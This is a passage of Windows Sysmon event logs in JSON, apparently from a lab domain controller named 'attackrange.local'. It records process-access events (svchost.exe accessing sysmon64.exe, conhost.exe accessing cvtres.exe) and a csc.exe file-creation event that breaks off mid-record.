{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:10.924\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nProcessId: 3064\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.dll\r\nCreationUtcTime: 2020-08-01 07:59:10.861","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:10.924","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.dll","CreationUtcTime":"2020-08-01 07:59:10.861","EventReceivedTime":"2020-08-01 